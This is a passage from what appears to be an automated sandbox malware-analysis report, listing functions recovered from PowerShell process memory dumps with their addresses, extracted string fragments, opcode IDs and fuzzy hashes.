                                                        • Instruction Fuzzy Hash: BF416672E0E7C75FD7129BA8A8750E43FA0AF5162870A41F7C4988F1B3EE2C29438755
                                                        Function 00007FFD9B7E87A5 Relevance: 6.4, Strings: 5, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: K_^$K_^$K_^$K_^$K_^
                                                        • API String ID: 0-3188868157
                                                        • Opcode ID: d3975ea6539968908eb389ef5704f7495d004edcabb3d367685538bcae2daf3f
                                                        • Instruction ID: 0a30aa4a577687ebcee566fefb679379875aeacb0ca660972e35288b5e298b41
                                                        • Opcode Fuzzy Hash: d3975ea6539968908eb389ef5704f7495d004edcabb3d367685538bcae2daf3f
                                                        • Instruction Fuzzy Hash: 1641A853E1F7D60FE7235AA9A8B54E53F90EF12A14B0A02F7C4E45F0B3EE142956C241

                                                        Executed Functions

                                                        Function 07A38918 Relevance: 13.2, Strings: 10, Instructions: 727COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                        • API String ID: 0-2890353280
                                                        • Opcode ID: 2b9e4bc79b9b6a8323997c2c557120502d8e321d938cb5abde4324c7dbde4cb9
                                                        • Instruction ID: 4ca082341de6528529563565802d983f75f4b35d0877fe91c8ce99891c671daf
                                                        • Opcode Fuzzy Hash: 2b9e4bc79b9b6a8323997c2c557120502d8e321d938cb5abde4324c7dbde4cb9
                                                        • Instruction Fuzzy Hash: 4452B3B0A00319CFDB54DF68C850B9ABBB2AF85304F1084AAF5199F355CB75ED85CBA1
                                                        Function 04B0CF10 Relevance: 10.5, Strings: 8, Instructions: 523COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8N)k$Hbq$h])k$h])k$h])k$$^q$$^q$I)k
                                                        • API String ID: 0-3897658310
                                                        • Opcode ID: d8872d6531439fbfe3d93d795e3856c2dda85e23ab544e4982cb9028307699d6
                                                        • Instruction ID: 01ec248b9d8a43d5eeaed645e07db149a4c52de4b2a78eb430c7b15f935cf399
                                                        • Opcode Fuzzy Hash: d8872d6531439fbfe3d93d795e3856c2dda85e23ab544e4982cb9028307699d6
                                                        • Instruction Fuzzy Hash: 88226134B002188FDB25DB65D9546AEBBF6AF89305F1080E9D40AAB3A1DF35ED45CF81
                                                        Function 07A35FC0 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                        • API String ID: 0-3272787073
                                                        • Opcode ID: e0498fc072726b4342083baab109304d3d4e41a816d67d5342f8084a9ef79db1
                                                        • Instruction ID: 72cae7350a200ec4b17c74a865d3608e1a3ea10ddd9d7e163ab08fd925046308
                                                        • Opcode Fuzzy Hash: e0498fc072726b4342083baab109304d3d4e41a816d67d5342f8084a9ef79db1
                                                        • Instruction Fuzzy Hash: 5D614BB0A04345EFCB258F69C845A66BBB1AFC2310F24C4ABF825CF252DB35C849C761
                                                        Function 07A30748 Relevance: 4.0, Strings: 3, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q
                                                        • API String ID: 0-953868773
                                                        • Opcode ID: 4bde5c326167b98b931e52432fc4f558bd1d45a5922daede6a781c4264824aed
                                                        • Instruction ID: b265aedbeb32be0905886853db6675dc42f9e322b6ee2d684dc44659fbe3c1a3
                                                        • Opcode Fuzzy Hash: 4bde5c326167b98b931e52432fc4f558bd1d45a5922daede6a781c4264824aed
                                                        • Instruction Fuzzy Hash: 067135B1A00219CFDB149F68880176BBBA7EFC5311F14846AF865CB355DB35C885CBE2
                                                        Function 07A37808 Relevance: 2.9, Strings: 2, Instructions: 438COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tP^q$tP^q
                                                        • API String ID: 0-309238000
                                                        • Opcode ID: fd0bfe667d2c9ad1b49c422344b7e7ea14da001ea1aad1a70b5fbd7a4fff096d
                                                        • Instruction ID: be0ed857bb4a87167632492d0c5d4f616786dbb31b3f116b71bd09927fdf8b1f
                                                        • Opcode Fuzzy Hash: fd0bfe667d2c9ad1b49c422344b7e7ea14da001ea1aad1a70b5fbd7a4fff096d
                                                        • Instruction Fuzzy Hash: 56F1C2F0B002059FDB14DF68C994BAABBE2AFC5310F248469E5159F395CB36EC85CB91
                                                        Function 07A3932B Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q
                                                        • API String ID: 0-2697143702
                                                        • Opcode ID: bbe9a2a7761c25ae5fb8d10471b29f355722aa7f7fb56e3be7f517b8450e949d
                                                        • Instruction ID: d86ec3609e192ab3fc0d3eebe7208c5567f0b8f573f05d6fc90496745791ebb3
                                                        • Opcode Fuzzy Hash: bbe9a2a7761c25ae5fb8d10471b29f355722aa7f7fb56e3be7f517b8450e949d
                                                        • Instruction Fuzzy Hash: 3CF172B0A002199FEB24DF68CD50F5ABBB3ABC4304F108495E509AB795CB75ED89CB91
                                                        Function 04B0DBC8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h])k$I)k
                                                        • API String ID: 0-782987090
                                                        • Opcode ID: 3b90b15cf8bf9d00bbcd0b925b7c59cf6eea43034fcd83a514b90edeb41cbd53
                                                        • Instruction ID: 075c967621eced71ed735da41ebeb70b6a22ecd0141fad92be1a67a9fd62d809
                                                        • Opcode Fuzzy Hash: 3b90b15cf8bf9d00bbcd0b925b7c59cf6eea43034fcd83a514b90edeb41cbd53
                                                        • Instruction Fuzzy Hash: 11315230B001188FDB25DB64D8946EEBBF6BF89345F1085E9D509A7391CB35AE81CF80
                                                        Function 07A308C2 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q
                                                        • API String ID: 0-388095546
                                                        • Opcode ID: 7071b2f500f8f0a1cf9e0440d2ef2364553582043835ef2231f28506aee529c5
                                                        • Instruction ID: 6ca852b498551b074b481105b49e11daeb1c23c328b0c0a5bcb4522534bc281e
                                                        • Opcode Fuzzy Hash: 7071b2f500f8f0a1cf9e0440d2ef2364553582043835ef2231f28506aee529c5
                                                        • Instruction Fuzzy Hash: D38115B2B04346DFD7154F28D8107ABBBB6AFC6210F1484ABF4A5CB252CB35D885C7A1
                                                        Function 07A3631C Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tP^q
                                                        • API String ID: 0-2862610199
                                                        • Opcode ID: b536955a45d5f971957f8b7dbec84a1211773e1e4a1bdce4446907fbe032f91f
                                                        • Instruction ID: a014b20fd067102556ad79d9ea4fafeb96fd8898255b2ea76c654233a42fad51
                                                        • Opcode Fuzzy Hash: b536955a45d5f971957f8b7dbec84a1211773e1e4a1bdce4446907fbe032f91f
                                                        • Instruction Fuzzy Hash: 465138B0A49381AFDB16CF64D814A65BFB1AF86210F19C4EBE054CF2A3C735D885C752
                                                        Function 07A37DF0 Relevance: .7, Instructions: 741COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e1e82039ca57b6d62eab73a93b1d298b39d28d6b1e370e6d8cd0e65220a51ef
                                                        • Instruction ID: 01dd32b411935598f891099014056a083cde2d5d6f13ec60645965eaa76dc9f5
                                                        • Opcode Fuzzy Hash: 2e1e82039ca57b6d62eab73a93b1d298b39d28d6b1e370e6d8cd0e65220a51ef
                                                        • Instruction Fuzzy Hash: 17627BB0A00209CFD714DF98C951E5ABBB2BF89304F24C469E9159F369CB76EC49CB91
                                                        Function 07A37DD3 Relevance: .6, Instructions: 572COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f389935259d093c865c68ef2450c3f4c246a893bf6ca16654e096fccd868631
                                                        • Instruction ID: c933671d55c91fce228f3867f1472cc29a9e184a6b98841ef64a13717b0bf5fb
                                                        • Opcode Fuzzy Hash: 2f389935259d093c865c68ef2450c3f4c246a893bf6ca16654e096fccd868631
                                                        • Instruction Fuzzy Hash: 21325BB4A00205DFD714CF98C991E9ABBB2BF84304F25C099E9199F366CB76EC45CB91
                                                        Function 07A38565 Relevance: .5, Instructions: 483COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ab0fbe84ad26793cd52f341f43c1548566ca265dcaa9a3fb9f22cbe5873073f
                                                        • Instruction ID: 5825e9625d594a8ad312c8965e2c6cdc3d1fb4603c9f46c818458f1f7b2cf9bb
                                                        • Opcode Fuzzy Hash: 0ab0fbe84ad26793cd52f341f43c1548566ca265dcaa9a3fb9f22cbe5873073f
                                                        • Instruction Fuzzy Hash: 511217B4A00205DFD714CF98C951E5ABBB2BF84305F14C0A9F9259F365CB7AE849CB91
                                                        Function 04B0AD90 Relevance: .3, Instructions: 314COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e52371aeb60e453b3109d897840d2447488bf847a57aac394af9a96686a5ce63
                                                        • Instruction ID: b96d79e1dbefcaf9a52edb64a2aa23a764e2f60e80d36ee7e1c0833b09ac64cc
                                                        • Opcode Fuzzy Hash: e52371aeb60e453b3109d897840d2447488bf847a57aac394af9a96686a5ce63
                                                        • Instruction Fuzzy Hash: B1C16B35A002089FDB14DFA4C544A9DBFB2FF89315F1585A9E806AB3A4DB74FD49CB80
                                                        Function 04B03670 Relevance: .3, Instructions: 310COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4486ddf5a9b6a8ff0eeba3b7da1124d5ff41aeafaa76582b910510cea33912cf
                                                        • Instruction ID: ae4a2f4a5b1dfc17ab151bab6b70166d23403fb50802d4203e06849eaa04e21f
                                                        • Opcode Fuzzy Hash: 4486ddf5a9b6a8ff0eeba3b7da1124d5ff41aeafaa76582b910510cea33912cf
                                                        • Instruction Fuzzy Hash: B3D1E474A012099FDB15CFA8D588A9DBBF2FF48310F25C199E805AB3A5C735ED85CB90
                                                        Function 04B08DFB Relevance: .3, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e551115a81bbd79666bb03e4413bb60570dfb662212c50308f3abb68a7456889
                                                        • Instruction ID: 505aca9b1072dc5777326c93901a5721326f058910612a345a8ea910c4e522ee
                                                        • Opcode Fuzzy Hash: e551115a81bbd79666bb03e4413bb60570dfb662212c50308f3abb68a7456889
                                                        • Instruction Fuzzy Hash: E6A15D30A002089FDB14EFB8D444AADBBF6FF88314F1485A9E415AB7A4DB35ED46CB41
                                                        Function 04B0AAC8 Relevance: .2, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f43fbdb195cf7959189e679c2e5a6bfb08f2723cb05b6fe3783f85af48798d83
                                                        • Instruction ID: d8c649633c943cac72b266a62c05020f59b10425fa5dbee8a949f441468cdf91
                                                        • Opcode Fuzzy Hash: f43fbdb195cf7959189e679c2e5a6bfb08f2723cb05b6fe3783f85af48798d83
                                                        • Instruction Fuzzy Hash: B491A130A013449FCB14DFA8D884AAEBFF2FF89311F1585A9E4459B7A1DB35E885CB50
                                                        Function 08696780 Relevance: .2, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2323731785.0000000008690000.00000040.00000800.00020000.00000000.sdmp, Offset: 08690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_8690000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8be0d7bfaeaeb4dedef98d0e7b9616ad6e6e0273242244f332e847c9ab21df6
                                                        • Instruction ID: b0bb4317e33f756bab9c0fdb79cf407c449b7bcd33ed34b96aaa3993027e9585
                                                        • Opcode Fuzzy Hash: e8be0d7bfaeaeb4dedef98d0e7b9616ad6e6e0273242244f332e847c9ab21df6
                                                        • Instruction Fuzzy Hash: B06191709063858FCB06CF68C9949AEBFB1FF46310B26459AC481DF3A2D735AC45CBA1
                                                        Function 04B087BA Relevance: .2, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f49620b24e7d8de753d291a1e5ba24eb65c0261a1d6f06b938d0cc4f5f7de00
                                                        • Instruction ID: e1dce0b78f532833c2d258ea704be5dce435e199af28fe4b491440d2d2b436d7
                                                        • Opcode Fuzzy Hash: 5f49620b24e7d8de753d291a1e5ba24eb65c0261a1d6f06b938d0cc4f5f7de00
                                                        • Instruction Fuzzy Hash: 43714135A002499FDB14DFA4D584A9DBFB2FF84301F258564E402AF7A9D774EE89CB80
                                                        Function 04B087C8 Relevance: .2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 680ec600f0d5421216255d8be8dffc548f383358327e3e0d89344495b8bb4847
                                                        • Instruction ID: 248096bdb05b3306c84742e077b09c4d1439d9c6ef0c0312f7eb6b65a6da97bb
                                                        • Opcode Fuzzy Hash: 680ec600f0d5421216255d8be8dffc548f383358327e3e0d89344495b8bb4847
                                                        • Instruction Fuzzy Hash: DB610F34A002499FDB14DFA4D544A9DBFB2FF85301F158564E402AF7A9DB78EE89CB80
                                                        Function 04B087A5 Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2376959d53754edfe93b233709330fcfc9a467993645e34490644c9e59c736a7
                                                        • Instruction ID: 798f4a323e5f5a2b9bcc0764c3a9b965927f5779f0f49c25c527d98fc0cbe6ce
                                                        • Opcode Fuzzy Hash: 2376959d53754edfe93b233709330fcfc9a467993645e34490644c9e59c736a7
                                                        • Instruction Fuzzy Hash: 5E515E34A002499FCB14DFA4D544AADBFB2FF85301F258598E402AF7A5D774EE89CB80
                                                        Function 07A32CAD Relevance: .1, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 684d8009311e806cbc25d0cb6f1d29a5218095f66b27ac3cb99a961b5b7ce2b1
                                                        • Instruction ID: 1493319912ebe6e2ccf1e89646615316eb82f808c0f2f125b2d94f6661b440cc
                                                        • Opcode Fuzzy Hash: 684d8009311e806cbc25d0cb6f1d29a5218095f66b27ac3cb99a961b5b7ce2b1
                                                        • Instruction Fuzzy Hash: 0C416EF27012148BC7255F789411B9A7BA2BFD5354B1084BAE512CF795CA32C84AC3A1
                                                        Function 04B0B2E4 Relevance: .1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae27f12d177c7797144a43c6c3c040d31b31948388ace4d6942bb9bc6de0708c
                                                        • Instruction ID: 2586c4c2280438986ce6e843ea9f793abeeb017965dee3cfaa7f46ec98539272
                                                        • Opcode Fuzzy Hash: ae27f12d177c7797144a43c6c3c040d31b31948388ace4d6942bb9bc6de0708c
                                                        • Instruction Fuzzy Hash: 0B417E357042008FDB24DFA4C594AAEBBF2EFC8755F1484A8E506EB7A0DB35AD42DB50
                                                        Function 08696770 Relevance: .1, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2323731785.0000000008690000.00000040.00000800.00020000.00000000.sdmp, Offset: 08690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_8690000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e430a2e67bd953f6fc3533b92773f9f0452c50bef553c35ec56a76256af50ef
                                                        • Instruction ID: f81f957e500ab5bebb920397ad251b032707213988a074c68d63b0ca56d72830
                                                        • Opcode Fuzzy Hash: 6e430a2e67bd953f6fc3533b92773f9f0452c50bef553c35ec56a76256af50ef
                                                        • Instruction Fuzzy Hash: BF410974E01209DFCB05CF98C5949AEBBB5FF48310B268669D845AB3A5D731AC41CFA0
                                                        Function 04B08190 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9224ea5866998e455b37c79df47b5dbbededfeeda2d5f8bfaf38fc1064b4c17
                                                        • Instruction ID: c65da0ba901900d3fbde417bfc3fddc4e7240c6754a39ed66b1a4320994a3313
                                                        • Opcode Fuzzy Hash: d9224ea5866998e455b37c79df47b5dbbededfeeda2d5f8bfaf38fc1064b4c17
                                                        • Instruction Fuzzy Hash: C2419974B002468FCB45DF28C5848AEBBF6FF8A200B1045AAE402CB771DB30ED58CB90
                                                        Function 04B08B1A Relevance: .1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83eca659d94094d61aac55eb7fc7a6943a364f3310e389afc03bf20fd6c7a746
                                                        • Instruction ID: 34e8808d35ef7adfcba301626e11eb75b81a5571d862bf3ff23aa252d3d82bdd
                                                        • Opcode Fuzzy Hash: 83eca659d94094d61aac55eb7fc7a6943a364f3310e389afc03bf20fd6c7a746
                                                        • Instruction Fuzzy Hash: B73149357001049FDB14DF28D598A9DBBF6EF8C721F2440A9E506EB3A1DB72AD42CB50
                                                        Function 04B08CAB Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c70cc8b78642427836f0f2ae09ebd1b7c5ee0e5a0c990d228f3f2213d5f80d6
                                                        • Instruction ID: 58cfd83fe6338594faf191d5f3d6c1b1ef7b00aa40aa8b9ef6ad8e664f89fd48
                                                        • Opcode Fuzzy Hash: 9c70cc8b78642427836f0f2ae09ebd1b7c5ee0e5a0c990d228f3f2213d5f80d6
                                                        • Instruction Fuzzy Hash: 45316970A00209CFDB18DFA5C8847ADBBF2FF88304F1485A9C802AB7A4DB75A945DF40
                                                        Function 04B03A64 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1dfbba9b4d8b4968e90504fe3832d05c61b68828d4ebc159a12e4fdf18c199aa
                                                        • Instruction ID: 077ce23bfddf854aa9233c7f9123baf2b4d31642faf8794234d904a2e4a4ef6d
                                                        • Opcode Fuzzy Hash: 1dfbba9b4d8b4968e90504fe3832d05c61b68828d4ebc159a12e4fdf18c199aa
                                                        • Instruction Fuzzy Hash: 6C11B25654E3E05FD703AB28A9700DA7FB0AD4722470A41D7C4E0CF1B3D519998EC7AA
                                                        Function 04B031C8 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3a3f7bd5b2c9f5e14d5c0b936371506fad93015653c027f9a4b9e798c0de3025
                                                        • Instruction ID: 423107effcc4b63583ebc170e7e424ac92654da8afb08930df4d0e263eb7319b
                                                        • Opcode Fuzzy Hash: 3a3f7bd5b2c9f5e14d5c0b936371506fad93015653c027f9a4b9e798c0de3025
                                                        • Instruction Fuzzy Hash: B7213BB4A052199FCB04CF98C9809AABBF5FF89310B158596E819EB352C735FD41CBA1
                                                        Function 04B08320 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00371064b9b15ba4986f3c57fec9bc2a4bc83880b503785f47c0c0bc260dbe64
                                                        • Instruction ID: 7321e6245000c3b48e38b9fb49ed903a8ef3d99643ffa96c8f53c5b72c92d9e7
                                                        • Opcode Fuzzy Hash: 00371064b9b15ba4986f3c57fec9bc2a4bc83880b503785f47c0c0bc260dbe64
                                                        • Instruction Fuzzy Hash: 24118631205344CFC716D768D408B59BFA5EF86719F0984EEF0488F6A2C776E846C765
                                                        Function 04B031B8 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab51cfa51029a52496f81f193722d9b384b349d5f6cbe400cc17b65d38bd1635
                                                        • Instruction ID: 8e61e3db7d06e4b03f45b733218d9b079d187e4b1d04d100c050d60496d1396d
                                                        • Opcode Fuzzy Hash: ab51cfa51029a52496f81f193722d9b384b349d5f6cbe400cc17b65d38bd1635
                                                        • Instruction Fuzzy Hash: C1213874A042499FCB00CFA8D9809AABBF4FF89310B148599E819EB352C731FD41CBA1
                                                        Function 086968A4 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
